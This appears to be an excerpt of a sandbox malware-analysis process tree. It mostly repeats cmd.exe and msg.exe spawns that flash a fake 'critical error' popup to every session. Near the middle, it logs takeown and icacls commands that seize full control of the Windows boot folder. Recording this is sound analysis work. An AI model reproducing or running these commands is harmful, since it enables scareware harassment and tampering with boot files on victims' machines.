C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24716

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12188

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:18380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12684

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9824

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22520

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8132

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22828

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23604

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22972

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24176

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14520

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14348

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11120

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8720

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23520

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:10740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23500

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21956

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:17192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16956

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23892

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15928

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14876

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /F C:\Windows\Boot /R /D Y
5⤵
PID:21588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Boot /grant administrators:F /T
5⤵
PID:13680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13656

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:17312

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:4692

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13120

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12280

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12356

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14792

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:3140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14208

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:18344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22664

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15060

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15884

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:5812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16816

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:17332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25300

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22888

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16692

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14608

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8096

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7588

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7888

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7900

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7380

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7368

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8144

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7816

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:984

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13144

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:628

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13036

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23128

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:1780

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12916

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23780

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13936

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:4740

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:5224

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8176

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10456

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12960

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13068

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9008

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:1680

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6824

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13992

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12904

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15424

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13960

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6664

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:7852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12828

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:3792

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22940

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7036

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8740

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13280

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13716

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23712

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22028

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7020

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13056

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13472

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:556

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:5880

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8552

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24020

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:16348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21496

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13772

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:5904

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:2468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15380

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:6380

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11840

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24980

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25520

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23748

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23908

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24768

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:25376

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:25400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23016

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:11268

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8284

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:11024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:10564

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8900

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:8876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8860

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:3820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22220

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:8776

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22956

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:5476

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:20876

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:15316

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:17352

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:16072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16076

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:5744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:16148

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:16156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14700

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:5660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:2868

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14164

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13692

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:13652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:12912

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:15912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21204

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:12856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:7328

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21584

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22860

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22408

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22572

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:6896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:13916

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14816

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:5124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21620

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22604

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:23560

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:9464

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:23344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24072

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:14316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:21568

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22632

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:22652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:22672

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:24028

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:24040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c msg * Error: Your system has encountered a critical error!
5⤵
PID:14344

C:\Windows\system32\msg.exe
msg * Error: Your system has encountered a critical error!
6⤵
PID:21152

